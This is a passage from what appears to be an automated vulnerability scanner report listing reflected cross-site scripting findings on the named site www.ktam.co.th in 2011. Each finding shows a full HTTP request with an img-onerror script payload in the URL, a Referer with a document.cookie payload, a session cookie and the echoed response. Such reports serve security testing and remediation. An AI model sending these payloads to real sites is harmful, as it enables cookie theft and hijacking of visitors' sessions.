Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29524

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b_nav21.gif4a41c\"><img src=a onerror=alert(1)>27d7fb1ea05" title="THAI">
...[SNIP]...

5.93. http://www.ktam.co.th/en/index.php/ims/b_nav22.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_nav22.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57968"><img%20src%3da%20onerror%3dalert(1)>640f5a655e8 was submitted in the REST URL parameter 4. This input was echoed as 57968\"><img src=a onerror=alert(1)>640f5a655e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/b_nav22.gif57968"><img%20src%3da%20onerror%3dalert(1)>640f5a655e8 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:30 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29524

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b_nav22.gif57968\"><img src=a onerror=alert(1)>640f5a655e8" title="THAI">
...[SNIP]...

5.94. http://www.ktam.co.th/en/index.php/ims/b_nav23.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_nav23.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 991c8"><img%20src%3da%20onerror%3dalert(1)>9694ceaeb47 was submitted in the REST URL parameter 4. This input was echoed as 991c8\"><img src=a onerror=alert(1)>9694ceaeb47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/b_nav23.gif991c8"><img%20src%3da%20onerror%3dalert(1)>9694ceaeb47 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:18 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29524

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b_nav23.gif991c8\"><img src=a onerror=alert(1)>9694ceaeb47" title="THAI">
...[SNIP]...

5.95. http://www.ktam.co.th/en/index.php/ims/bg_cr1.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bg_cr1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 924a6"><img%20src%3da%20onerror%3dalert(1)>d3d0793b7d5 was submitted in the REST URL parameter 4. This input was echoed as 924a6\"><img src=a onerror=alert(1)>d3d0793b7d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/bg_cr1.gif924a6"><img%20src%3da%20onerror%3dalert(1)>d3d0793b7d5 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:31 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29523

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/bg_cr1.gif924a6\"><img src=a onerror=alert(1)>d3d0793b7d5" title="THAI">
...[SNIP]...

5.96. http://www.ktam.co.th/en/index.php/ims/bg_head1.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bg_head1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a55c6"><img%20src%3da%20onerror%3dalert(1)>b558b73adaa was submitted in the REST URL parameter 4. This input was echoed as a55c6\"><img src=a onerror=alert(1)>b558b73adaa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/bg_head1.gifa55c6"><img%20src%3da%20onerror%3dalert(1)>b558b73adaa HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:54 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29525

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/bg_head1.gifa55c6\"><img src=a onerror=alert(1)>b558b73adaa" title="THAI">
...[SNIP]...

5.97. http://www.ktam.co.th/en/index.php/ims/bg_mmenu01.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bg_mmenu01.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e495"><img%20src%3da%20onerror%3dalert(1)>b77eab408fe was submitted in the REST URL parameter 4. This input was echoed as 6e495\"><img src=a onerror=alert(1)>b77eab408fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/bg_mmenu01.gif6e495"><img%20src%3da%20onerror%3dalert(1)>b77eab408fe HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:54 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29527

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/bg_mmenu01.gif6e495\"><img src=a onerror=alert(1)>b77eab408fe" title="THAI">
...[SNIP]...

5.98. http://www.ktam.co.th/en/index.php/ims/bg_mmenu02.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bg_mmenu02.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c942"><img%20src%3da%20onerror%3dalert(1)>826aa00ad2 was submitted in the REST URL parameter 4. This input was echoed as 5c942\"><img src=a onerror=alert(1)>826aa00ad2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/bg_mmenu02.gif5c942"><img%20src%3da%20onerror%3dalert(1)>826aa00ad2 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:00 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29526

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/bg_mmenu02.gif5c942\"><img src=a onerror=alert(1)>826aa00ad2" title="THAI">
...[SNIP]...

5.99. http://www.ktam.co.th/en/index.php/ims/bg_search1.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bg_search1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fb94"><img%20src%3da%20onerror%3dalert(1)>85b4af7d086 was submitted in the REST URL parameter 4. This input was echoed as 2fb94\"><img src=a onerror=alert(1)>85b4af7d086 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/bg_search1.gif2fb94"><img%20src%3da%20onerror%3dalert(1)>85b4af7d086 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:28 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29527

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/bg_search1.gif2fb94\"><img src=a onerror=alert(1)>85b4af7d086" title="THAI">
...[SNIP]...

5.100. http://www.ktam.co.th/en/index.php/ims/bt_about1.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bt_about1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd94c"><img%20src%3da%20onerror%3dalert(1)>847b2be6901 was submitted in the REST URL parameter 4. This input was echoed as dd94c\"><img src=a onerror=alert(1)>847b2be6901 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/bt_about1.gifdd94c"><img%20src%3da%20onerror%3dalert(1)>847b2be6901 HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:58 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29526

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/bt_about1.gifdd94c\"><img src=a onerror=alert(1)>847b2be6901" title="THAI">
...[SNIP]...

5.101. http://www.ktam.co.th/en/index.php/ims/bt_agent1.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bt_agent1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 225c7"><img%20src%3da%20onerror%3dalert(1)>ee9e5de15ec was submitted in the REST URL parameter 4. This input was echoed as 225c7\"><img src=a onerror=alert(1)>ee9e5de15ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/bt_agent1.gif225c7"><img%20src%3da%20onerror%3dalert(1)>ee9e5de15ec HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:07 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29526

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/bt_agent1.gif225c7\"><img src=a onerror=alert(1)>ee9e5de15ec" title="THAI">
...[SNIP]...

5.102. http://www.ktam.co.th/en/index.php/ims/bt_education_center1.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bt_education_center1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41001"><img%20src%3da%20onerror%3dalert(1)>a19663f1591 was submitted in the REST URL parameter 4. This input was echoed as 41001\"><img src=a onerror=alert(1)>a19663f1591 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/bt_education_center1.gif41001"><img%20src%3da%20onerror%3dalert(1)>a19663f1591 HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:01 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29537

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/bt_education_center1.gif41001\"><img src=a onerror=alert(1)>a19663f1591" title="THAI">
...[SNIP]...

5.103. http://www.ktam.co.th/en/index.php/ims/bt_home2.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bt_home2.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28774"><img%20src%3da%20onerror%3dalert(1)>8c408bdb0a was submitted in the REST URL parameter 4. This input was echoed as 28774\"><img src=a onerror=alert(1)>8c408bdb0a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/bt_home2.gif28774"><img%20src%3da%20onerror%3dalert(1)>8c408bdb0a HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:53 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29524

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/bt_home2.gif28774\"><img src=a onerror=alert(1)>8c408bdb0a" title="THAI">
...[SNIP]...

5.104. http://www.ktam.co.th/en/index.php/ims/bt_news1.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bt_news1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ee5"><img%20src%3da%20onerror%3dalert(1)>d1f09911baa was submitted in the REST URL parameter 4. This input was echoed as b0ee5\"><img src=a onerror=alert(1)>d1f09911baa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/bt_news1.gifb0ee5"><img%20src%3da%20onerror%3dalert(1)>d1f09911baa HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:03 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29525

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/bt_news1.gifb0ee5\"><img src=a onerror=alert(1)>d1f09911baa" title="THAI">
...[SNIP]...

5.105. http://www.ktam.co.th/en/index.php/ims/bt_service1.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bt_service1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d355c"><img%20src%3da%20onerror%3dalert(1)>ae21f0a9811 was submitted in the REST URL parameter 4. This input was echoed as d355c\"><img src=a onerror=alert(1)>ae21f0a9811 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/bt_service1.gifd355c"><img%20src%3da%20onerror%3dalert(1)>ae21f0a9811 HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:00 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29528

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/bt_service1.gifd355c\"><img src=a onerror=alert(1)>ae21f0a9811" title="THAI">
...[SNIP]...

5.106. http://www.ktam.co.th/en/index.php/ims/cmd_search1.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
